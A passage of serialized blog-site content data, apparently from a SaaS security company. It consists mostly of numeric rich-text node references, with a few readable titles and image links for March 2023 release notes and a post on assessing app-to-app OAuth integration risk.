target":325803},{"sys":325804},{"id":301561,"type":317,"linkType":318},[],{"nodeType":235,"data":325807,"content":325808},{},[325809],{"nodeType":173,"value":301567,"marks":325810,"data":325811},[],{},{"nodeType":178,"data":325813,"content":325814},{},[325815,325818,325822,325829],{"nodeType":173,"value":21634,"marks":325816,"data":325817},[],{},{"nodeType":173,"value":301577,"marks":325819,"data":325821},[325820],{"type":370},{},{"nodeType":186,"data":325823,"content":325824},{"uri":301457},[325825],{"nodeType":173,"value":301585,"marks":325826,"data":325828},[325827],{"type":370},{},{"nodeType":173,"value":301590,"marks":325830,"data":325831},[],{},{"nodeType":178,"data":325833,"content":325834},{},[325835,325838,325842],{"nodeType":173,"value":301597,"marks":325836,"data":325837},[],{},{"nodeType":173,"value":301601,"marks":325839,"data":325841},[325840],{"type":370},{},{"nodeType":173,"value":1477,"marks":325843,"data":325844},[],{},{"nodeType":312,"data":325846,"content":325849},{"target":325847},{"sys":325848},{"id":301612,"type":317,"linkType":318},[],{"nodeType":235,"data":325851,"content":325852},{},[325853],{"nodeType":173,"value":301618,"marks":325854,"data":325855},[],{},{"nodeType":178,"data":325857,"content":325858},{},[325859,325862,325868,325871,325875],{"nodeType":173,"value":301625,"marks":325860,"data":325861},[],{},{"nodeType":186,"data":325863,"content":325864},{"uri":301630},[325865],{"nodeType":173,"value":301633,"marks":325866,"data":325867},[],{},{"nodeType":173,"value":301637,"marks":325869,"data":325870},[],{},{"nodeType":173,"value":301641,"marks":325872,"data":325874},[325873],{"type":370},{},{"nodeType":173,"value":1477,"marks":325876,"data":325877},[],{},{"entries":325879},{"hyperlink":325880,"inline":325881,"block":325882},[],[],[325883,325887,325894,325900],{"sys":325884,"__typename":5434,"title":325885,"arcadeDemoUrl":325886,"playText":51639},{"id":301308},"Demo: Inline browser nudges","https://demo.arcade.software/lHn8AdnfCEo8DgWBCQ82?embed",{"sys":325888,"__typename":5345,"title":325889,"caption":118,"layoutMode":118,"file":325890},{"id":301388},"Integration - consented by - release notes March 2023",{"url":325891,"width":325892,"height":325893},"https://images.ctfassets.net/y1cdw1ablpvd/6g9uvSDrQ99uLyrmaGICJW/24a8164582599da6ed3dbc7dcbc8e196/last_used_integrations.png",991,406,{"sys":325895,"__typename":5345,"title":325896,"caption":118,"layoutMode":118,"file":325897},{"id":301561},"Custom word list - release notes March 2023",{"url":325898,"width":325899,"height":89477},"https://images.ctfassets.net/y1cdw1ablpvd/2DeSsR8VV7o6foQhXoHwWH/619798501c4ad6f315282254cff6d632/custom_words_list_config.png",1576,{"sys":325901,"__typename":5345,"title":325902,"caption":118,"layoutMode":118,"file":325903},{"id":301612},"Account security page - docs - View SaaS apps & activity",{"url":325904,"width":57879,"height":325905},"https://images.ctfassets.net/y1cdw1ablpvd/5dAGdTR8Nosxw8CEDpv8vb/f588775602276d9a0028a0d29ae201bb/accounts_page_20231219.png",838,"content:blog:product-release-march-2023.json","blog/product-release-march-2023.json","blog/product-release-march-2023",{"_path":325910,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":325911,"ogImage":118,"summary":325913,"title":292999,"subtitle":118,"metaTitle":325923,"synopsis":293000,"hashTags":118,"publishedDate":293001,"slug":293002,"tagsCollection":325924,"relatedBlogPostsCollection":325930,"authorsCollection":327870,"content":327874,"_id":328345,"_type":5439,"_source":5440,"_file":328346,"_stem":328347,"_extension":5439},"/blog/an-investigation-guide-for-assessing-app-to-app-oauth-integration-risk",{"id":292540,"publishedAt":325912},"2023-08-07T10:35:39.350Z",{"json":325914},{"data":325915,"content":325916,"nodeType":165},{},[325917],{"data":325918,"content":325919,"nodeType":178},{},[325920],{"data":325921,"marks":325922,"value":293000,"nodeType":173},{},[],"An investigation guide for assessing app-to-app integration risk",{"items":325925},[325926,325928],{"sys":325927,"name":509},{"id":508},{"sys":325929,"name":26133},{"id":26132},{"items":325931},[325932,327072,327488],{"__typename":1528,"sys":325933,"content":325934,"title":270678,"synopsis":269387,"hashTags":118,"publishedDate":270679,"slug":270680,"tagsCollection":327062,"authorsCollection":327068},{"id":269371},{"json":325935},{"nodeType":165,"data":325936,"content":325937},{},[325938,325944,325950,325956,325962,325980,325986,325991,325997,326003,326009,326037,326042,326048,326156,326162,326168,326402,326408,326414,326420,326446,326452,326458,326463,326469,326474,326480,326486,326492,326498,326504,326510,326516,326522,326527,326533,326546,326552,326558,326584,326590,326606,326612,326618,326624,326630,326661,326677,326725,326731,326737,326753,326769,326775,326801,326807,326813,326819,326825,326831,326837,326843,326859,326864,326870,326885,326891,326897,326902,326908,326914,326919,326925,326961,326967,326972,326978,326983,326989,326995,327021,327027,327033,327039,327045,327051,327056],{"nodeType":178,"data":325939,"content":325940},{},[325941],{"nodeType":173,"value":269380,"marks":325942,"data":325943},[],{},{"nodeType":178,"data":325945,"content":325946},{},[325947],{"nodeType":173,"value":269387,"marks":325948,"data":325949},[],{},{"nodeType":169,"data":325951,"content":325952},{},[325953],{"nodeType":173,"value":39940,"marks":325954,"data":325955},[],{},{"nodeType":235,"data":325957,"content":325958},{},[325959],{"nodeType":173,"value":269400,"marks":325960,"data":325961},[],{},{"nodeType":178,"data":325963,"content":325964},{},[325965,325968,325977],{"nodeType":173,"value":269407,"marks":325966,"data":325967},[],{},{"nodeType":1698,"data":325969,"content":325972},{"target":325970},{"sys":325971},{"id":269414,"type":317,"linkType":318},[325973],{"nodeType":173,"value":269417,"marks":325974,"data":325976},[325975],{"type":194},{},{"nodeType":173,"value":269422,"marks":325978,"data":325979},[],{},{"nodeType":178,"data":325981,"content":325982},{},[325983],{"nodeType":173,"value":269429,"marks":325984,"data":325985},[],{},{"nodeType":312,"data":325987,"content":325990},{"target":325988},{"sys":325989},{"id":269436,"type":317,"linkType":318},[],{"nodeType":235,"data":325992,"content":325993},{},[325994],{"nodeType":173,"value":269442,"marks":325995,"data":325996},[],{},{"nodeType":178,"data":325998,"content":325999},{},[326000],{"nodeType":173,"value":269449,"marks":326001,"data":326002},[],{},{"nodeType":178,"data":326004,"content":326005},{},[326006],{"nodeType":173,"value":269456,"marks":326007,"data":326008},[],{},{"nodeType":178,"data":326010,"content":326011},{},[326012,326015,326022,326025,326034],{"nodeType":173,"value":269463,"marks":326013,"data":326014},[],{},{"nodeType":186,"data":326016,"content":326017},{"uri":269468},[326018],{"nodeType":173,"value":269471,"marks":326019,"data":326021},[326020],{"type":194},{},{"nodeType":173,"value":269476,"marks":326023,"data":326024},[],{},{"nodeType":1698,"data":326026,"content":326029},{"target":326027},{"sys":326028},{"id":269483,"type":317,"linkType":318},[326030],{"nodeType":173,"value":269486,"marks":326031,"data":326033},[326032],{"type":194},{},{"nodeType":173,"value":269491,"marks":326035,"data":326036},[],{},{"nodeType":312,"data":326038,"content":326041},{"target":326039},{"sys":326040},{"id":269498,"type":317,"linkType":318},[],{"nodeType":178,"data":326043,"content":326044},{},[326045],{"nodeType":173,"value":269504,"marks":326046,"data":326047},[],{},{"nodeType":1653,"data":326049,"content":326050},{},[326051,326072,326093,326114,326135],{"nodeType":1657,"data":326052,"content":326053},{},[326054,326063],{"nodeType":1687,"data":326055,"content":326056},{},[326057],{"nodeType":178,"data":326058,"content":326059},{},[326060],{"nodeType":173,"value":269520,"marks":326061,"data":326062},[],{},{"nodeType":1687,"data":326064,"content":326065},{},[326066],{"nodeType":178,"data":326067,"content":326068},{},[326069],{"nodeType":173,"value":269530,"marks":326070,"data":326071},[],{},{"nodeType":1657,"data":326073,"content":326074},{},[326075,326084],{"nodeType":1687,"data":326076,"content":326077},{},[326078],{"nodeType":178,"data":326079,"content":326080},{},[326081],{"nodeType":173,"value":269543,"marks":326082,"data":326083},[],{},{"nodeType":1687,"data":326085,"content":326086},{},[326087],{"nodeType":178,"data":326088,"content":326089},{},[326090],{"nodeType":173,"value":269553,"marks":326091,"data":326092},[],{},{"nodeType":1657,"data":326094,"content":326095},{},[326096,326105],{"nodeType":1687,"data":326097,"content":326098},{},[326099],{"nodeType":178,"data":326100,"content":326101},{},[326102],{"nodeType":173,"value":269566,"marks":326103,"data":326104},[],{},{"nodeType":1687,"data":326106,"content":326107},{},[326108],{"nodeType":178,"data":326109,"content":326110},{},[326111],{"nodeType":173,"value":269576,"marks":326112,"data":326113},[],{},{"nodeType":1657,"data":326115,"content":326116},{},[326117,326126],{"nodeType":1687,"data":326118,"content":326119},{},[326120],{"nodeType":178,"data":326121,"content":326122},{},[326123],{"nodeType":173,"value":269589,"marks":326124,"data":326125},[],{},{"nodeType":1687,"data":326127,"content":326128},{},[326129],{"nodeType":178,"data":326130,"content":326131},{},[326132],{"nodeType":173,"value":269599,"marks":326133,"data":326134},[],{},{"nodeType":1657,"data":326136,"content":326137},{},[326138,326147],{"nodeType":1687,"data":326139,"content":326140},{},[326141],{"nodeType":178,"data":326142,"content":326143},{},[326144],{"nodeType":173,"value":269612,"marks":326145,"data":326146},[],{},{"nodeType":1687,"data":326148,"content":326149},{},[326150],{"nodeType":178,"data":326151,"content":326152},{},[326153],{"nodeType":173,"value":269622,"marks":326154,"data":326155},[],{},{"nodeType":178,"data":326157,"content":326158},{},[326159],{"nodeType":173,"value":269629,"marks":326160,"data":326161},[],{},{"nodeType":178,"data":326163,"content":326164},{},[326165],{"nodeType":173,"value":269636,"marks":326166,"data":326167},[],{},{"nodeType":1653,"data":326169,"content":326170},{},[326171,326192,326213,326234,326255,326276,326297,326318,326339,326360,326381],{"nodeType":1657,"data":326172,"content":326173},{},[326174,326183],{"nodeType":1687,"data":326175,"content":326176},{},[326177],{"nodeType":178,"data":326178,"content":326179},{},[326180],{"nodeType":173,"value":269652,"marks":326181,"data":326182},[],{},{"nodeType":1687,"data":326184,"content":326185},{},[326186],{"nodeType":178,"data":326187,"content":326188},{},[326189],{"nodeType":173,"value":269662,"marks":326190,"data":326191},[],{},{"nodeType":1657,"data":326193,"content":326194},{},[326195,326204],{"nodeType":1687,"data":326196,"content":326197},{},[326198],{"nodeType":178,"data":326199,"content":326200},{},[326201],{"nodeType":173,"value":269675,"marks":326202,"data":326203},[],{},{"nodeType":1687,"data":326205,"content":326206},{},[326207],{"nodeType":178,"data":326208,"content":326209},{},[326210],{"nodeType":173,"value":269685,"marks":326211,"data":326212},[],{},{"nodeType":1657,"data":326214,"content":326215},{},[326216,326225],{"nodeType":1687,"data":326217,"content":326218},{},[326219],{"nodeType":178,"data":326220,"content":326221},{},[326222],{"nodeType":173,"value":269698,"marks":326223,"data":326224},[],{},{"nodeType":1687,"data":326226,"content":326227},{},[326228],{"nodeType":178,"data":326229,"content":326230},{},[326231],{"nodeType":173,"value":269708,"marks":326232,"data":326233},[],{},{"nodeType":1657,"data":326235,"content":326236},{},[326237,326246],{"nodeType":1687,"data":326238,"content":326239},{},[326240],{"nodeType":178,"data":326241,"content":326242},{},[326243],{"nodeType":173,"value":269721,"marks":326244,"data":326245},[],{},{"nodeType":1687,"data":326247,"content":326248},{},[326249],{"nodeType":178,"data":326250,"content":326251},{},[326252],{"nodeType":173,"value":269731,"marks":326253,"data":326254},[],{},{"nodeType":1657,"data":326256,"content":326257},{},[326258,326267],{"nodeType":1687,"data":326259,"content":326260},{},[326261],{"nodeType":178,"data":326262,"content":326263},{},[326264],{"nodeType":173,"value":269744,"marks":326265,"data":326266},[],{},{"nodeType":1687,"data":326268,"content":326269},{},[326270],{"nodeType":178,"data":326271,"content":326272},{},[326273],{"nodeType":173,"value":269754,"marks":326274,"data":326275},[],{},{"nodeType":1657,"data":326277,"content":326278},{},[326279,326288],{"nodeType":1687,"data":326280,"content":326281},{},[326282],{"nodeType":178,"data":326283,"content":326284},{},[326285],{"nodeType":173,"value":269767,"marks":326286,"data":326287},[],{},{"nodeType":1687,"data":326289,"content":326290},{},[326291],{"nodeType":178,"data":326292,"content":326293},{},[326294],{"nodeType":173,"value":269777,"marks":326295,"data":326296},[],{},{"nodeType":1657,"data":326298,"content":326299},{},[326300,326309],{"nodeType":1687,"data":326301,"content":326302},{},[326303],{"nodeType":178,"data":326304,"content":326305},{},[326306],{"nodeType":173,"value":269790,"marks":326307,"data":326308},[],{},{"nodeType":1687,"data":326310,"content":326311},{},[326312],{"nodeType":178,"data":326313,"content":326314},{},[326315],{"nodeType":173,"value":269800,"marks":326316,"data":326317},[],{},{"nodeType":1657,"data":326319,"content":326320},{},[326321,326330],{"nodeType":1687,"data":326322,"content":326323},{},[326324],{"nodeType":178,"data":326325,"content":326326},{},[326327],{"nodeType":173,"value":269813,"marks":326328,"data":326329},[],{},{"nodeType":1687,"data":326331,"content":326332},{},[326333],{"nodeType":178,"data":326334,"content":326335},{},[326336],{"nodeType":173,"value":269823,"marks":326337,"data":326338},[],{},{"nodeType":1657,"data":326340,"content":326341},{},[326342,326351],{"nodeType":1687,"data":326343,"content":326344},{},[326345],{"nodeType":178,"data":326346,"content":326347},{},[326348],{"nodeType":173,"value":269836,"marks":326349,"data":326350},[],{},{"nodeType":1687,"data":326352,"content":326353},{},[326354],{"nodeType":178,"data":326355,"content":326356},{},[326357],{"nodeType":173,"value":269846,"marks":326358,"data":326359},[],{},{"nodeType":1657,"data":326361,"content":326362},{},[326363,326372],{"nodeType":1687,"data":326364,"content":326365},{},[326366],{"nodeType":178,"data":326367,"content":326368},{},[326369],{"nodeType":173,"value":269859,"marks":326370,"data":326371},[],{},{"nodeType":1687,"data":326373,"content":326374},{},[326375],{"nodeType":178,"data":326376,"content":326377},{},[326378],{"nodeType":173,"value":269869,"marks":326379,"data":326380},[],{},{"nodeType":1657,"data":326382,"content":326383},{},[326384,326393],{"nodeType":1687,"data":326385,"content":326386},{},[326387],{"nodeType":178,"data":326388,"content":326389},{},[326390],{"nodeType":173,"value":269882,"marks":326391,"data":326392},[],{},{"nodeType":1687,"data":326394,"content":326395},{},[326396],{"nodeType":178,"data":326397,"content":326398},{},[326399],{"nodeType":173,"value":269892,"marks":326400,"data":326401},[],{},{"nodeType":178,"data":326403,"content":326404},{},[326405],{"nodeType":173,"value":269899,"marks":326406,"data":326407},[],{},{"nodeType":169,"data":326409,"content":326410},{},[326411],{"nodeType":173,"value":269906,"marks":326412,"data":326413},[],{},{"nodeType":235,"data":326415,"content":326416},{},[326417],{"nodeType":173,"value":269400,"marks":326418,"data":326419},[],{},{"nodeType":178,"data":326421,"content":326422},{},[326423,326426,326433,326436,326443],{"nodeType":173,"value":269919,"marks":326424,"data":326425},[],{},{"nodeType":186,"data":326427,"content":326428},{"uri":269924},[326429],{"nodeType":173,"value":269927,"marks":326430,"data":326432},[326431],{"type":194},{},{"nodeType":173,"value":269932,"marks":326434,"data":326435},[],{},{"nodeType":186,"data":326437,"content":326438},{"uri":269937},[326439],{"nodeType":173,"value":269940,"marks":326440,"data":326442},[326441],{"type":194},{},{"nodeType":173,"value":269945,"marks":326444,"data":326445},[],{},{"nodeType":178,"data":326447,"content":326448},{},[326449],{"nodeType":173,"value":269952,"marks":326450,"data":326451},[],{},{"nodeType":178,"data":326453,"content":326454},{},[326455],{"nodeType":173,"value":269959,"marks":326456,"data":326457},[],{},{"nodeType":312,"data":326459,"content":326462},{"target":326460},{"sys":326461},{"id":269966,"type":317,"linkType":318},[],{"nodeType":178,"data":326464,"content":326465},{},[326466],{"nodeType":173,"value":269972,"marks":326467,"data":326468},[],{},{"nodeType":312,"data":326470,"content":326473},{"target":326471},{"sys":326472},{"id":269979,"type":317,"linkType":318},[],{"nodeType":178,"data":326475,"content":326476},{},[326477],{"nodeType":173,"value":269985,"marks":326478,"data":326479},[],{},{"nodeType":178,"data":326481,"content":326482},{},[326483],{"nodeType":173,"value":269992,"marks":326484,"data":326485},[],{},{"nodeType":235,"data":326487,"content":326488},{},[326489],{"nodeType":173,"value":269442,"marks":326490,"data":326491},[],{},{"nodeType":178,"data":326493,"content":326494},{},[326495],{"nodeType":173,"value":270005,"marks":326496,"data":326497},[],{},{"nodeType":169,"data":326499,"content":326500},{},[326501],{"nodeType":173,"value":270012,"marks":326502,"data":326503},[],{},{"nodeType":235,"data":326505,"content":326506},{},[326507],{"nodeType":173,"value":269400,"marks":326508,"data":326509},[],{},{"nodeType":178,"data":326511,"content":326512},{},[326513],{"nodeType":173,"value":270025,"marks":326514,"data":326515},[],{},{"nodeType":178,"data":326517,"content":326518},{},[326519],{"nodeType":173,"value":270032,"marks":326520,"data":326521},[],{},{"nodeType":312,"data":326523,"content":326526},{"target":326524},{"sys":326525},{"id":270039,"type":317,"linkType":318},[],{"nodeType":178,"data":326528,"content":326529},{},[326530],{"nodeType":173,"value":270045,"marks":326531,"data":326532},[],{},{"nodeType":178,"data":326534,"content":326535},{},[326536,326539,326543],{"nodeType":173,"value":270052,"marks":326537,"data":326538},[],{},{"nodeType":173,"value":270056,"marks":326540,"data":326542},[326541],{"type":1646},{},{"nodeType":173,"value":270061,"marks":326544,"data":326545},[],{},{"nodeType":235,"data":326547,"content":326548},{},[326549],{"nodeType":173,"value":269442,"marks":326550,"data":326551},[],{},{"nodeType":178,"data":326553,"content":326554},{},[326555],{"nodeType":173,"value":270074,"marks":326556,"data":326557},[],{},{"nodeType":178,"data":326559,"content":326560},{},[326561,326564,326571,326574,326581],{"nodeType":173,"value":270081,"marks":326562,"data":326563},[],{},{"nodeType":186,"data":326565,"content":326566},{"uri":270086},[326567],{"nodeType":173,"value":148689,"marks":326568,"data":326570},[326569],{"type":194},{},{"nodeType":173,"value":270093,"marks":326572,"data":326573},[],{},{"nodeType":186,"data":326575,"content":326576},{"uri":270098},[326577],{"nodeType":173,"value":270101,"marks":326578,"data":326580},[326579],{"type":194},{},{"nodeType":173,"value":270106,"marks":326582,"data":326583},[],{},{"nodeType":178,"data":326585,"content":326586},{},[326587],{"nodeType":173,"value":270113,"marks":326588,"data":326589},[],{},{"nodeType":178,"data":326591,"content":326592},{},[326593,326596,326603],{"nodeType":173,"value":270120,"marks":326594,"data":326595},[],{},{"nodeType":186,"data":326597,"content":326598},{"uri":270125},[326599],{"nodeType":173,"value":270128,"marks":326600,"data":326602},[326601],{"type":194},{},{"nodeType":173,"value":270133,"marks":326604,"data":326605},[],{},{"nodeType":178,"data":326607,"content":326608},{},[326609],{"nodeType":173,"value":270140,"marks":326610,"data":326611},[],{},{"nodeType":178,"data":326613,"content":326614},{},[326615],{"nodeType":173,"value":270147,"marks":326616,"data":326617},[],{},{"nodeType":169,"data":326619,"content":326620},{},[326621],{"nodeType":173,"value":270154,"marks":326622,"data":326623},[],{},{"nodeType":235,"data":326625,"content":326626},{},[326627],{"nodeType":173,"value":269400,"marks":326628,"data":326629},[],{},{"nodeType":178,"data":326631,"content":326632},{},[326633,326637,326645,326649,326657],{"nodeType":173,"value":270167,"marks":326634,"data":326636},[326635],{"type":1646},{},{"nodeType":186,"data":326638,"content":326639},{"uri":270173},[326640],{"nodeType":173,"value":270176,"marks":326641,"data":326644},[326642,326643],{"type":194},{"type":1646},{},{"nodeType":173,"value":270182,"marks":326646,"data":326648},[326647],{"type":1646},{},{"nodeType":186,"data":326650,"content":326651},{"uri":270188},[326652],{"nodeType":173,"value":270191,"marks":326653,"data":326656},[326654,326655],{"type":194},{"type":1646},{},{"nodeType":173,"value":270197,"marks":326658,"data":326660},[326659],{"type":1646},{},{"nodeType":178,"data":326662,"content":326663},{},[326664,326667,326674],{"nodeType":173,"value":270205,"marks":326665,"data":326666},[],{},{"nodeType":186,"data":326668,"content":326669},{"uri":270210},[326670],{"nodeType":173,"value":270213,"marks":326671,"data":326673},[326672],{"type":194},{},{"nodeType":173,"value":270218,"marks":326675,"data":326676},[],{},{"nodeType":246189,"data":326678,"content":326679},{},[326680,326689,326698,326707,326716],{"nodeType":254,"data":326681,"content":326682},{},[326683],{"nodeType":178,"data":326684,"content":326685},{},[326686],{"nodeType":173,"value":270231,"marks":326687,"data":326688},[],{},{"nodeType":254,"data":326690,"content":326691},{},[326692],{"nodeType":178,"data":326693,"content":326694},{},[326695],{"nodeType":173,"value":270241,"marks":326696,"data":326697},[],{},{"nodeType":254,"data":326699,"content":326700},{},[326701],{"nodeType":178,"data":326702,"content":326703},{},[326704],{"nodeType":173,"value":270251,"marks":326705,"data":326706},[],{},{"nodeType":254,"data":326708,"content":326709},{},[326710],{"nodeType":178,"data":326711,"content":326712},{},[326713],{"nodeType":173,"value":270261,"marks":326714,"data":326715},[],{},{"nodeType":254,"data":326717,"content":326718},{},[326719],{"nodeType":178,"data":326720,"content":326721},{},[326722],{"nodeType":173,"value":270271,"marks":326723,"data":326724},[],{},{"nodeType":178,"data":326726,"content":326727},{},[326728],{"nodeType":173,"value":270278,"marks":326729,"data":326730},[],{},{"nodeType":178,"data":326732,"content":326733},{},[326734],{"nodeType":173,"value":270285,"marks":326735,"data":326736},[],{},{"nodeType":178,"data":326738,"content":326739},{},[326740,326743,326750],{"nodeType":173,"value":270292,"marks":326741,"data":326742},[],{},{"nodeType":186,"data":326744,"content":326745},{"uri":270297},[326746],{"nodeType":173,"value":270300,"marks":326747,"data":326749},[326748],{"type":194},{},{"nodeType":173,"value":270305,"marks":326751,"data":326752},[],{},{"nodeType":178,"data":326754,"content":326755},{},[326756,326759,326766],{"nodeType":173,"value":270312,"marks":326757,"data":326758},[],{},{"nodeType":186,"data":326760,"content":326761},{"uri":270210},[326762],{"nodeType":173,"value":270319,"marks":326763,"data":326765},[326764],{"type":194},{},{"nodeType":173,"value":270324,"marks":326767,"data":326768},[],{},{"nodeType":178,"data":326770,"content":326771},{},[326772],{"nodeType":173,"value":270331,"marks":326773,"data":326774},[],{},{"nodeType":178,"data":326776,"content":326777},{},[326778,326781,326788,326791,326798],{"nodeType":173,"value":270338,"marks":326779,"data":326780},[],{},{"nodeType":186,"data":326782,"content":326783},{"uri":270343},[326784],{"nodeType":173,"value":270346,"marks":326785,"data":326787},[326786],{"type":194},{},{"nodeType":173,"value":270351,"marks":326789,"data":326790},[],{},{"nodeType":186,"data":326792,"content":326793},{"uri":270356},[326794],{"nodeType":173,"value":270359,"marks":326795,"data":326797},[326796],{"type":194},{},{"nodeType":173,"value":270364,"marks":326799,"data":326800},[],{},{"nodeType":235,"data":326802,"content":326803},{},[326804],{"nodeType":173,"value":269442,"marks":326805,"data":326806},[],{},{"nodeType":178,"data":326808,"content":326809},{},[326810],{"nodeType":173,"value":270377,"marks":326811,"data":326812},[],{},{"nodeType":178,"data":326814,"content":326815},{},[326816],{"nodeType":173,"value":270384,"marks":326817,"data":326818},[],{},{"nodeType":178,"data":326820,"content":326821},{},[326822],{"nodeType":173,"value":270391,"marks":326823,"data":326824},[],{},{"nodeType":169,"data":326826,"content":326827},{},[326828],{"nodeType":173,"value":270398,"marks":326829,"data":326830},[],{},{"nodeType":178,"data":326832,"content":326833},{},[326834],{"nodeType":173,"value":270405,"marks":326835,"data":326836},[],{},{"nodeType":235,"data":326838,"content":326839},{},[326840],{"nodeType":173,"value":270412,"marks":326841,"data":326842},[],{},{"nodeType":178,"data":326844,"content":326845},{},[326846,326849,326856],{"nodeType":173,"value":270419,"marks":326847,"data":326848},[],{},{"nodeType":186,"data":326850,"content":326851},{"uri":270424},[326852],{"nodeType":173,"value":270427,"marks":326853,"data":326855},[326854],{"type":194},{},{"nodeType":173,"value":270432,"marks":326857,"data":326858},[],{},{"nodeType":312,"data":326860,"content":326863},{"target":326861},{"sys":326862},{"id":270439,"type":317,"linkType":318},[],{"nodeType":178,"data":326865,"content":326866},{},[326867],{"nodeType":173,"value":270445,"marks":326868,"data":326869},[],{},{"nodeType":178,"data":326871,"content":326872},{},[326873,326876,326882],{"nodeType":173,"value":270452,"marks":326874,"data":326875},[],{},{"nodeType":186,"data":326877,"content":326878},{"uri":270457},[326879],{"nodeType":173,"value":270460,"marks":326880,"data":326881},[],{},{"nodeType":173,"value":270464,"marks":326883,"data":326884},[],{},{"nodeType":235,"data":326886,"content":326887},{},[326888],{"nodeType":173,"value":270471,"marks":326889,"data":326890},[],{},{"nodeType":178,"data":326892,"content":326893},{},[326894],{"nodeType":173,"value":270478,"marks":326895,"data":326896},[],{},{"nodeType":312,"data":326898,"content":326901},{"target":326899},{"sys":326900},{"id":270485,"type":317,"linkType":318},[],{"nodeType":235,"data":326903,"content":326904},{},[326905],{"nodeType":173,"value":270491,"marks":326906,"data":326907},[],{},{"nodeType":178,"data":326909,"content":326910},{},[326911],{"nodeType":173,"value":270498,"marks":326912,"data":326913},[],{},{"nodeType":312,"data":326915,"content":326918},{"target":326916},{"sys":326917},{"id":270505,"type":317,"linkType":318},[],{"nodeType":235,"data":326920,"content":326921},{},[326922],{"nodeType":173,"value":270511,"marks":326923,"data":326924},[],{},{"nodeType":178,"data":326926,"content":326927},{},[326928,326931,326938,326941,326948,326951,326958],{"nodeType":173,"value":270518,"marks":326929,"data":326930},[],{},{"nodeType":186,"data":326932,"content":326933},{"uri":270523},[326934],{"nodeType":173,"value":270526,"marks":326935,"data":326937},[326936],{"type":194},{},{"nodeType":173,"value":270531,"marks":326939,"data":326940},[],{},{"nodeType":186,"data":326942,"content":326943},{"uri":270536},[326944],{"nodeType":173,"value":270539,"marks":326945,"data":326947},[326946],{"type":194},{},{"nodeType":173,"value":270544,"marks":326949,"data":326950},[],{},{"nodeType":186,"data":326952,"content":326953},{"uri":270549},[326954],{"nodeType":173,"value":270552,"marks":326955,"data":326957},[326956],{"type":194},{},{"nodeType":173,"value":270557,"marks":326959,"data":326960},[],{},{"nodeType":178,"data":326962,"content":326963},{},[326964],{"nodeType":173,"value":270564,"marks":326965,"data":326966},[],{},{"nodeType":312,"data":326968,"content":326971},{"target":326969},{"sys":326970},{"id":270571,"type":317,"linkType":318},[],{"nodeType":178,"data":326973,"content":326974},{},[326975],{"nodeType":173,"value":270577,"marks":326976,"data":326977},[],{},{"nodeType":312,"data":326979,"content":326982},{"target":326980},{"sys":326981},{"id":270584,"type":317,"linkType":318},[],{"nodeType":235,"data":326984,"content":326985},{},[326986],{"nodeType":173,"value":270590,"marks":326987,"data":326988},[],{},{"nodeType":178,"data":326990,"content":326991},{},[326992],{"nodeType":173,"value":270597,"marks":326993,"data":326994},[],{},{"nodeType":178,"data":326996,"content":326997},{},[326998,327001,327008,327011,327018],{"nodeType":173,"value":270604,"marks":326999,"data":327000},[],{},{"nodeType":186,"data":327002,"content":327003},{"uri":270609},[327004],{"nodeType":173,"value":270612,"marks":327005,"data":327007},[327006],{"type":194},{},{"nodeType":173,"value":270617,"marks":327009,"data":327010},[],{},{"nodeType":186,"data":327012,"content":327013},{"uri":270622},[327014],{"nodeType":173,"value":270625,"marks":327015,"data":327017},[327016],{"type":194},{},{"nodeType":173,"value":270630,"marks":327019,"data":327020},[],{},{"nodeType":169,"data":327022,"content":327023},{},[327024],{"nodeType":173,"value":40632,"marks":327025,"data":327026},[],{},{"nodeType":178,"data":327028,"content":327029},{},[327030],{"nodeType":173,"value":270643,"marks":327031,"data":327032},[],{},{"nodeType":178,"data":327034,"content":327035},{},[327036],{"nodeType":173,"value":270650,"marks":327037,"data":327038},[],{},{"nodeType":178,"data":327040,"content":327041},{},[327042],{"nodeType":173,"value":270657,"marks":327043,"data":327044},[],{},{"nodeType":178,"data":327046,"content":327047},{},[327048],{"nodeType":173,"value":270664,"marks":327049,"data":327050},[],{},{"nodeType":312,"data":327052,"content":327055},{"target":327053},{"sys":327054},{"id":209109,"type":317,"linkType":318},[],{"nodeType":178,"data":327057,"content":327058},{},[327059],{"nodeType":173,"value":37,"marks":327060,"data":327061},[],{},{"items":327063},[327064,327066],{"sys":327065,"name":505},{"id":504},{"sys":327067,"name":509},{"id":508},{"items":327069},[327070],{"fullName":155981,"firstName":155982,"jobTitle":155983,"profilePicture":327071},{"url":155985},{"__typename":1528,"sys":327073,"content":327074,"title":288168,"synopsis":318418,"hashTags":118,"publishedDate":318419,"slug":288169,"tagsCollection":327478,"authorsCollection":327484},{"id":274110},{"json":327075},{"data":327076,"content":327077,"nodeType":165},{},[327078,327085,327092,327110,327117,327135,327141,327146,327152,327158,327164,327170,327176,327182,327188,327194,327200,327205,327211,327217,327223,327229,327245,327250,327256,327261,327267,327272,327278,327284,327290,327329,327335,327351,327357,327439,327455,327461,327467,327472],{"data":327079,"content":327080,"nodeType":178},{},[327081],{"data":327082,"marks":327083,"value":317965,"nodeType":173},{},[327084],{"type":1646},{"data":327086,"content":327087,"nodeType":178},{},[327088],{"data":327089,"marks":327090,"value":317973,"nodeType":173},{},[327091],{"type":1646},{"data":327093,"content":327094,"nodeType":178},{},[327095,327098,327107],{"data":327096,"marks":327097,"value":317980,"nodeType":173},{},[],{"data":327099,"content":327102,"nodeType":1698},{"target":327100},{"sys":327101},{"id":317985,"type":317,"linkType":318},[327103],{"data":327104,"marks":327105,"value":317991,"nodeType":173},{},[327106],{"type":194},{"data":327108,"marks":327109,"value":317995,"nodeType":173},{},[],{"data":327111,"content":327112,"nodeType":178},{},[327113],{"data":327114,"marks":327115,"value":318003,"nodeType":173},{},[327116],{"type":1646},{"data":327118,"content":327119,"nodeType":178},{},[327120,327123,327132],{"data":327121,"marks":327122,"value":318010,"nodeType":173},{},[],{"data":327124,"content":327127,"nodeType":1698},{"target":327125},{"sys":327126},{"id":269414,"type":317,"linkType":318},[327128],{"data":327129,"marks":327130,"value":318020,"nodeType":173},{},[327131],{"type":194},{"data":327133,"marks":327134,"value":318024,"nodeType":173},{},[],{"data":327136,"content":327137,"nodeType":178},{},[327138],{"data":327139,"marks":327140,"value":318031,"nodeType":173},{},[],{"data":327142,"content":327145,"nodeType":312},{"target":327143},{"sys":327144},{"id":318036,"type":317,"linkType":318},[],{"data":327147,"content":327148,"nodeType":178},{},[327149],{"data":327150,"marks":327151,"value":318044,"nodeType":173},{},[],{"data":327153,"content":327154,"nodeType":235},{},[327155],{"data":327156,"marks":327157,"value":318051,"nodeType":173},{},[],{"data":327159,"content":327160,"nodeType":178},{